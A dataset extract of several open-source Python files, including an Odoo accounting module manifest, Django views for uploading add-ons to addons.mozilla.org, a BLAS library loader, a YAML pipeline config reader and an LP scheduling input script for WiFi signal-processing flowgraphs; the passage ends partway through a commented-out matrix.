repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
acsone/mozaik | mozaik_account/__openerp__.py | 1 | 1753 | # -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of mozaik_account, an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# mozaik_account is free software:
# you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# mozaik_account is distributed in the hope that it will
# be useful but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the
# GNU Affero General Public License
# along with mozaik_account.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'MOZAIK: Account',
'version': '1.0.1',
"author": "ACSONE SA/NV",
"maintainer": "ACSONE SA/NV",
"website": "http://www.acsone.eu",
'category': 'Political Association',
'depends': [
'account_accountant',
'account_cancel',
'account_auto_installer',
'mozaik_mandate',
],
'description': """
MOZAIK Account
==============
Manage accounting features
""",
'images': [
],
'data': [
'security/account_security.xml',
'account_view.xml',
],
'qweb': [
],
'demo': [
],
'test': [
],
'license': 'AGPL-3',
'sequence': 150,
'installable': True,
'auto_install': False,
'application': False,
}
| agpl-3.0 | 5,313,263,469,645,565,000 | 28.216667 | 78 | 0.547633 | false |
mozilla/FlightDeck | apps/amo/views.py | 1 | 5070 | import commonware.log
import simplejson
from django.shortcuts import get_object_or_404 # render_to_response,
from django.http import HttpResponse, HttpResponseBadRequest
from amo import tasks
from amo.constants import STATUS_UPLOAD_FAILED, STATUS_UPLOAD_SCHEDULED
from amo.helpers import get_addon_details as _get_addon_details
from jetpack.models import PackageRevision
#from utils.exceptions import SimpleException
log = commonware.log.getLogger('f.amo')
def upload_to_amo(request, pk):
"""Upload a XPI to AMO
"""
# check if there this Add-on was uploaded with the same version name
revision = get_object_or_404(PackageRevision, pk=pk)
version = revision.get_version_name()
uploaded = PackageRevision.objects.filter(
package=revision.package).filter(
amo_version_name=version).exclude(
amo_status=None).exclude(
amo_status=STATUS_UPLOAD_FAILED).exclude(
amo_status=STATUS_UPLOAD_SCHEDULED)
if len(uploaded) > 0:
log.debug("This Add-on was already uploaded using version \"%s\"" % version)
log.debug(revision.amo_status)
return HttpResponseBadRequest("This Add-on was already uploaded using version \"%s\"" % version)
try:
PackageRevision.objects.get(
package=revision.package, amo_version_name=version,
amo_status=STATUS_UPLOAD_SCHEDULED)
except PackageRevision.DoesNotExist:
pass
else:
log.debug("This Add-on is currently scheduled to upload")
return HttpResponseBadRequest("This Add-on is currently scheduled to upload")
log.debug('AMOOAUTH: Scheduling upload to AMO')
tasks.upload_to_amo.delay(pk)
return HttpResponse('{"delayed": true}')
def get_addon_details_from_amo(request, pk):
""" Finds latest revision uploaded to AMO and pulls metadata from AMO
using `generic AMO API <https://developer.mozilla.org/en/addons.mozilla.org_%28AMO%29_API_Developers%27_Guide/The_generic_AMO_API>`_
:attr: pk (int) :class:`~jetpack.models.PackageRevision` primary key
:returns: add-on metadata or empty dict in JSON format
"""
# get PackageRevision
revision = get_object_or_404(PackageRevision, pk=pk)
# check if Package is synced with the AMO and last update was successful
if (not revision.package.amo_id
or revision.amo_status == STATUS_UPLOAD_FAILED):
return HttpResponse('{}')# mimetype="application/json")
# pull info
amo_meta = _get_addon_details(revision.package.amo_id,
revision.amo_file_id)
if 'deleted' in amo_meta:
# remove info about the amo_addon from Package
revision.package.amo_id = None
revision.package.amo_slug = None
revision.package.latest_uploaded = None
revision.package.save()
# remove info about uploads from revisions
revisions = revision.package.revisions.all()
for r in revisions:
r.amo_status = None
r.amo_version_name = None
r.amo_file_id = None
super(PackageRevision, r).save()
return HttpResponse(simplejson.dumps(amo_meta))
# update amo package data
amo_slug = amo_meta.get('slug', None)
if (amo_slug and
(not revision.package.amo_slug
or revision.package.amo_slug != amo_slug)):
revision.package.amo_slug = amo_slug
revision.package.save()
if amo_slug:
amo_meta['view_on_amo_url'] = revision.package.get_view_on_amo_url()
amo_meta['edit_on_amo_url'] = revision.package.get_edit_on_amo_url()
# update amo revision data
if ('version' in amo_meta
and amo_meta['version'] == revision.amo_version_name):
revision.amo_status = int(amo_meta['status_code'])
super(PackageRevision, revision).save()
return HttpResponse(simplejson.dumps(amo_meta),
mimetype="application/json")
def get_addon_details(request, pk):
"""Provide currently stored AMO Status (without contacting to AMO)
:attr: pk (int) :class:`~jetpack.models.PackageRevision` primary key
:returns: add-on metadata or empty dict in JSON format
"""
# get PackageRevision
revision = get_object_or_404(PackageRevision, pk=pk)
# check if Package was scheduled for upload
if revision.amo_status == None:
return HttpResponse('{}', mimetype="application/json")
amo_meta = {'status': revision.get_status_name(),
'status_code': revision.amo_status,
'version': revision.amo_version_name,
'get_addon_info_url': revision.get_status_url(),
'pk': revision.pk,
'uploaded': revision.amo_status != STATUS_UPLOAD_FAILED}
if revision.package.amo_slug:
amo_meta['view_on_amo_url'] = revision.package.get_view_on_amo_url()
amo_meta['edit_on_amo_url'] = revision.package.get_edit_on_amo_url()
return HttpResponse(simplejson.dumps(amo_meta),
mimetype="application/json")
| bsd-3-clause | -3,445,110,804,472,861,000 | 39.56 | 136 | 0.657791 | false |
nicholas-moreles/blaspy | blaspy/config.py | 1 | 1951 | """
Copyright (c) 2014-2015-2015, The University of Texas at Austin.
All rights reserved.
This file is part of BLASpy and is available under the 3-Clause
BSD License, which can be found in the LICENSE file at the top-level
directory or at http://opensource.org/licenses/BSD-3-Clause
"""
from .errors import raise_blas_os_error
from ctypes import cdll
from os import chdir, path
from platform import system
from struct import calcsize
# The name of the BLAS .so or .dll file. By default this is the OpenBLAS reference
# implementation bundled with BLASpy. Only modify if you wish to use a different version of BLAS
# or if your operating system is not supported by BLASpy out of the box.
BLAS_NAME = "" # default is ""
# True if the BLAS .so or .dll file is in the blaspy/lib subdirectory,
# False if Python should search for it.
IN_BLASPY_SUBDIRECTORY = True # default is True
###############################
# DO NOT EDIT BELOW THIS LINE #
###############################
# find the appropriate BLAS to use
if BLAS_NAME == "": # try to use included OpenBLAS
PREPEND = str(path.dirname(__file__))[:-6] + "lib/"
if system() == "Windows":
if calcsize("P") == 8: # 64-bit
BLAS_NAME = "libopenblas-0.2.13-win64-int32.dll"
chdir(PREPEND + "win64")
else: # 32-bit
BLAS_NAME = "libopenblas-0.2.13-win32.dll"
chdir(PREPEND + "win32")
PREPEND = ""
elif system() == "Linux":
if calcsize("P") == 8: # 64-bit
BLAS_NAME = "libopenblas-0.2.13-linux64.so"
PREPEND += "linux64/"
else: # 32-bit
BLAS_NAME = "libopenblas-0.2.13-linux32.so"
PREPEND += "linux32/"
else: # no appropriate OpenBLAS included, BLAS_NAME_OVERRIDE must be used
raise_blas_os_error()
else:
PREPEND = ""
# Change the directory and load the library
_libblas = cdll.LoadLibrary(PREPEND + BLAS_NAME) | bsd-3-clause | -4,852,845,395,253,406,000 | 34.490909 | 96 | 0.627883 | false |
khalidm/vcf_annotation_pipeline | src/config.py | 1 | 3349 | '''
Configuration file reading and access functions.
The configuration file is written in YAML and is supplied
by the user.
TODO: validation of config file input.
'''
import yaml
class Config(object):
def __init__(self, config_filename):
# Try to open and parse the YAML formatted config file
with open(config_filename) as config_file:
try:
config = yaml.load(config_file)
except yaml.YAMLError, exc:
print("Error in configuration file:", exc)
raise exc
self.config = config
self.config_filename = config_filename
def get_options(self, *options):
num_options = len(options)
if num_options == 1:
return self.get_option(options[0])
else:
return (self.get_option(o) for o in options)
def get_option(self, option):
'''Retrieve a global option from the configuration'''
if option in self.config:
return self.config[option]
else:
raise Exception("Unknown option: {}, not in configuration " \
"file: {}".format(option, self.config_filename))
def get_stage_options(self, stage, *options):
num_options = len(options)
if num_options == 1:
return self.get_stage_option(stage, options[0])
else:
return (self.get_stage_option(stage, o) for o in options)
def get_stage_option(self, stage, option):
'''Try to retrieve a configuration option for a particular stage.
If the stage does not define the option then look for it in the
default options.
'''
stages = self.config['stages']
if stage in stages:
this_stage = stages[stage]
# Look for the option in the specified stage
if option in this_stage:
return this_stage[option]
else:
# Look for the option in the defaults
defaults = self.config['defaults']
if option in defaults:
return defaults[option]
else:
# Option does not have a default value
raise Exception("Option: {} not defined in config for " \
"stage: {} nor in defaults in configuration " \
"file {}".format(option, stage, self.config_filename))
else:
# Stage does not exist in the config file
raise Exception("Unknown stage: {}, not in configuration " \
"file: {}".format(stage, self.config_filename))
def validate(self):
'''Check that the configuration is valid.'''
config = self.config
filename = self.config_filename
# Test for required fields: defaults, stages, fastqs, pipeline_id
check_required_field(config, filename, 'defaults')
check_required_field(config, filename, 'stages')
check_required_field(config, filename, 'vcf')
check_required_field(config, filename, 'pipeline_id')
def check_required_field(config, filename, field):
'''Utility to check whether a field exists in the config dictionary'''
if field not in config:
raise Exception("Configuration file {} does not have '{}' " \
"field".format(filename, field))
| bsd-3-clause | 1,210,728,800,399,517,700 | 36.629213 | 78 | 0.587041 | false |
manub686/atomix | r1cmplr/lpinput.py | 1 | 19222 | #!/usr/bin/env python
'''
Atomix project, lpinput.py, (TODO: summary)
Copyright (c) 2015 Stanford University
Released under the Apache License v2.0. See the LICENSE file for details.
Author(s): Manu Bansal
'''
import numpy as np
import sys
def main():
inpfile = sys.argv[1]
(inp, out) = lpinput(inpfile)
print inp
print out
def lpinput(inpfile):
#[inp, opt] = example();
#[inp, opt] = example1();
#[inp, opt] = example2();
#[inp, opt] = wifi_6mbps_steady_state();
#[inp, opt] = wifi_54mbps_steady_state();
(inp, opt) = new_flowgraphs(inpfile);
return (inp, opt)
def new_flowgraphs(inpfile):
opt = {}
inp = {}
#problem = 'wifi_54mbps_split';
#opt["lpoutfile"] = problem + '.lp';
opt["minimize_makespan"] = 1;
opt["constraints_no_overbook"] = 1;
opt["constraints_communication_allowance"] = 1;
opt["extra_information_zero_y_i_j"] = 0;
opt["relaxation_x_not_integer"] = 1;
opt["constant_scale_down_factor"] = 1;
# d = 12000; #deadline
D = 100000000; #"infinity" equivalent in expressing the ILP
#run(['wifi_schedule_data/' problem '.m']);
modname = inpfile.split('.py')[0]
print modname
mod = __import__(modname)
(p,G,q, dl,T) = mod.model(D)
print("DEADLINE = %d"%dl)
d = dl ## State Deadline
#n = size(p, 1);
#m = size(p, 2);
n = p.shape[0]; #number of jobs to schedule
m = p.shape[1]; #number of processors
print n, m
#raw_input()
# Communication costs between different processors (for some fixed transfer size): {qij}, 1 i m, 1 j m
#cpu2viterbi = 100;
#cpu2cpu = 1000;
# FIFO transfer time on same processor
#singular_fifo_transfer_time = 200;
#q = D*np.ones((m,m), dtype=np.int);
#for ii in range(4):
# for jj in range(4):
# if ii == jj:
# q[ii][jj] = singular_fifo_transfer_time;
# else:
# q[ii][jj] = cpu2cpu;
#for ii in range(4):
#for jj in range(3,9):
# for jj in range(4,8):
# q[ii][jj] = cpu2viterbi;
# q[jj][ii] = cpu2viterbi;
print
print "q matrix:"
print q
inp["n"] = n;
inp["d"] = d;
inp["D"] = D;
inp["G"] = G;
inp["m"] = m;
inp["p"] = p;
inp["q"] = q;
inp["T"] = T
return (inp, opt)
#function [inp, opt] = example1()
# opt["lpoutfile"] = 'example1.lp'
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# %n = 13; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8; 8,9; 9,10; 10,11; 11,12; 12,13];
# n = 4; d = 20000; G = [ 1,2; 2,3; 3,4];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9 %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 i n, 1 j m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# ]
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 i m, 1 j m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ]
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#
#function [inp, opt] = example2()
# opt["lpoutfile"] = 'example2.lp'
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# %n = 13; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8; 8,9; 9,10; 10,11; 11,12; 12,13];
# n = 8; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8];
# %n = 7; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9 %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 i n, 1 j m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ]
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 i m, 1 j m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ]
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#
#
#% 1 kFunctionUids_PacketSearch_PutUnalignedGetAligned,
#% 2 kFunctionUids_CfoCorrectorWifi_ApplyGainAndCorrectCfo,
#% 3 kFunctionUids_OfdmDemodulator64pCp16_demodulate,
#% 4 kFunctionUids_OfdmEqualizer_Equalize,
#%
#% 5 kFunctionUids_SoftDemapper_BpskFromYhstar,
#% 6 kFunctionUids_DeinterleaverLutWifi_Deinterleave,
#% 7 kFunctionUids_ViterbiBranchMetrics_calculate,
#% 8 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#%
#% 9 <mid decode happens on the VCP>
#%
#% 10 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 11 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 12 kFunctionUids_DescramblerWifi_Descramble,
#% 13 kFunctionUids_Crc32Wifi_UpdateCrc32
#
#% G: 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 8 -> 9 -> 10 -> 11 -> 12 -> 13
#% As expressed by the user, the graph has total dependency for a single iteration. The scheduler
#% must come up with a pipelined schedule to meet throughput requirements.
#%
#% Compute times on cpu/vcp:
#% 1: 200, 2: 400, 3: 200, 4: 600,
#% 5: 200, 6: 200, 7: 200, 8: 100,
#% 9: 4000 (vcp), D (cpu)
#% 10: 100, 11: 200, 12: 100, 13: 100
#
#function [inp, opt] = wifi_6mbps_steady_state()
# opt["lpoutfile"] = 'wifi_6mbps_steady_state.lp';
# opt["minimize_makespan"] = 0;
# %opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# n = 13; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8; 8,9; 9,10; 10,11; 11,12; 12,13];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9; %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 i n, 1 j m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# ...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 i m, 1 j m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#function [inp, opt] = wifi_9mbps_steady_state()
#
#end
#
#function [inp, opt] = example()
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# opt["constant_scale_down_factor"] = 1;
# %opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% d = 4800
#% D = 5000
#
#% d = 9600
#% D = 10000
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
#% n = 10 %number of jobs in the compute graph G
#%
#%
#%
#% G = [...
#% 1, 2;...
#% 2, 3;...
#% 3, 4;...
#% ...
#% 4, 5;...
#% 5, 6;...
#% ...
#% 4, 7;...
#% 7, 8;...
#% 8, 9;...
#% ...
#% 6, 10;...
#% 9, 10;...
#% ]
#
#
# %n = 10; d = 12000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8; 8,9; 6,10; 9,10;]
# %n = 9; d = 9000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8; 8,9; 6,9; ]
# n = 9; d = 20000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8; 8,9; 6,9; ]
# %n = 8; d = 4800; G = [1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8;]
# %n = 5; d = 2400; G = [ 1,2; 2,3; 3,4; 4,5; ]
#
# %G = randomDirectedGraph(n)
#
# D = d + 100;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9; %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 i n, 1 j m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, 200, 200;...
# ...
# 500, 500, 500, D, D, D, D, D, D;...
# 8000, 8000, 8000, 4000, 4000, 4000, 4000, D, D;...
# ...
# 500, 500, 500, D, D, D, D, D, D;...
# 300, 300, 300, D, D, D, D, D, D;...
# 8000, 8000, 8000, 4000, 4000, 4000, 4000, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 i m, 1 j m
#% q = [...
#% 0, 100, 100, 50, 50, 50, 50, 50, 50;...
#% 100, 0, 100, 50, 50, 50, 50, 50, 50;...
#% 100, 100 0, 50, 50, 50, 50, 50, 50;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% ]
#
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#
#% 1 kFunctionUids_PacketSearch_PutUnalignedGetAligned,
#% 2 kFunctionUids_CfoCorrectorWifi_ApplyGainAndCorrectCfo,
#% 3 kFunctionUids_OfdmDemodulator64pCp16_demodulate,
#% 4 kFunctionUids_OfdmEqualizer_Equalize,
#%
#% 5 kFunctionUids_SoftDemapper_64qamTable,
#% 6 kFunctionUids_DeinterleaverLutWifi_Deinterleave,
#% 7 kFunctionUids_ViterbiBranchMetrics_calculate,
#%
#% 8 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#% 9 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#% 10 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#% 11 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#%
#% 12 <mid decode happens on the VCP>
#% 13 <mid decode happens on the VCP>
#% 14 <mid decode happens on the VCP>
#% 15 <mid decode happens on the VCP>
#%
#% 16 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 17 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 18 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 19 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#
#% 20 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 21 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 22 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 23 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#
#% 24 kFunctionUids_DescramblerWifi_Descramble,
#% 25 kFunctionUids_Crc32Wifi_UpdateCrc32
#
#% G: 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7
#% 7 -> 8 -> 12 -> 16 -> 20
#% 7 -> 9 -> 13 -> 17 -> 21
#% 7 -> 10 -> 14 -> 18 -> 22
#% 7 -> 11 -> 15 -> 19 -> 23
#% 20 -> 24
#% 21 -> 24
#% 22 -> 24
#% 23 -> 24
#% 24 -> 25
#
#% As expressed by the user, the graph has total dependency for a single iteration. The scheduler
#% must come up with a pipelined schedule to meet throughput requirements.
#%
#% Compute times on cpu/vcp:
#% 1: 200, 2: 400, 3: 200, 4: 600,
#% 5: 200, 6: 200, 7: 200, 8: 100, 9: 100, 10:100, 11:100
#% 12, 13, 14, 15: 4000 (vcp), D (cpu)
#% 16, 17, 18, 19: 100
#% 20, 21, 22, 23: 200
#% 24: 100, 25: 100
#
#
#function [inp, opt] = wifi_54mbps_steady_state()
# opt["lpoutfile"] = 'wifi_54mbps_steady_state.lp';
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# %n = 25; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# %n = 25; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# %n = 25; d = 15000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# n = 25; d = 20000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# 7,8; 8,12; 12,16; 16,20;...
# 7,9; 9,13; 13,17; 17,21;...
# 7,10; 10,14; 14,18; 18,22;...
# 7,11; 11,15; 15,19; 19,23;...
# 20,24;...
# 21,24;...
# 22,24;...
# 23,24;...
# 24,25;...
# ];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9; %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 i n, 1 j m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# ...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 i m, 1 j m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
